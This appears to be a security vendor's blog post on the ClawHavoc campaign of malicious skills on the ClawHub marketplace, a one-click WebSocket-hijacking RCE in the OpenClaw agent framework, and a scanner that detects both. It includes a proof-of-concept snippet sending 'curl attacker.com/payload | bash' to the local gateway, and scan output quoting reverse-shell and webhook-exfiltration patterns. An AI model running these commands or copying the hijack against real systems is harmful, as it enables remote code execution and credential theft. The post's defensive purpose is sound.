341 Malicious Skills and a 1-Click RCE: Scanning OpenClaw Installations for ClawHavoc
TL;DR: The ClawHavoc campaign planted 341 malicious skills on ClawHub. Combined with GHSA-g8p2's 1-click RCE vulnerability, OpenClaw users face credential theft, reverse shells, and persistent backdoors. We built a scanner to detect it.
npx hackmyagent secure-openclawThe OpenClaw Problem
OpenClaw emerged as a popular framework for building AI agents with tool access. Its skill marketplace, ClawHub, made it easy to extend agents with community-contributed capabilities. Too easy, as it turned out.
ClawHavoc Campaign
A coordinated supply chain attack planted 341 malicious skills on ClawHub over a 6-month period. These skills appeared legitimate but contained:
- Credential harvesters -- Exfiltrating SSH keys, AWS credentials, and crypto wallets
- Reverse shells -- Establishing persistent backdoor access
- ClickFix social engineering -- Prompting users to paste malicious commands
- Typosquatting -- Impersonating popular skills with near-identical names
GHSA-g8p2: 1-Click RCE via WebSocket Hijacking
A critical vulnerability in OpenClaw's gateway allowed any website to hijack the local WebSocket connection:
// Malicious website can connect to OpenClaw gateway
const ws = new WebSocket("ws://localhost:3100");
ws.send(JSON.stringify({
action: "execute",
skill: "shell",
command: "curl attacker.com/payload | bash"
}));
// No authentication required. No user confirmation.Impact: Visit a malicious website while OpenClaw is running = full system compromise.
Introducing secure-openclaw
We added 34 specialized security checks to HackMyAgent that scan OpenClaw installations for ClawHavoc indicators, GHSA-g8p2 misconfigurations, and other attack patterns.
# Scan your OpenClaw installation npx hackmyagent secure-openclaw # Auto-fix what can be fixed npx hackmyagent secure-openclaw --fix # JSON output for CI/CD npx hackmyagent secure-openclaw --json
What It Detects
34 checks across 5 categories:
SKILL Checks (12)
Malicious skill detection
HEARTBEAT Checks (6)
Scheduled task abuse
GATEWAY Checks (6)
GHSA-g8p2 vulnerability detection (4 auto-fixable)
CONFIG Checks (6)
Insecure settings
SUPPLY Checks (4)
Supply chain attacks
Example Output
$ npx hackmyagent secure-openclaw ~/.moltbot OpenClaw Security Report Target: /Users/dev/.moltbot Risk Level: CRITICAL CRITICAL FINDINGS (3) [SKILL-005] Reverse shell pattern detected File: skills/helper-utils/SKILL.md Line: 42 Pattern: bash -i >& /dev/tcp/ Remediation: Remove this skill immediately [SKILL-004] Data exfiltration via webhook File: skills/sync-helper/SKILL.md Line: 28 Pattern: curl -X POST https://webhook.site/... Remediation: Verify destination; remove if unauthorized [GATEWAY-001] Gateway bound to 0.0.0.0 File: openclaw.json Config: "host": "0.0.0.0" Remediation: Bind to 127.0.0.1 for local-only access Summary: 3 critical, 5 high, 12 medium, 4 low Exit code: 1 (failures detected)
The Bigger Picture
ClawHavoc and GHSA-g8p2 are symptoms of a deeper problem: AI agents are granted extensive system access without adequate identity verification, capability restrictions, or behavioral monitoring.
To properly secure AI agents, you need:
- Cryptographic identity -- Agents prove who they are
- Capability-based access control -- Agents can only do what they're explicitly authorized to do
- Continuous trust evaluation -- Behavioral anomalies trigger alerts
- Complete audit trails -- Every action logged and attributable
Scan Your OpenClaw Installation
34 security checks. One command. Free and open source.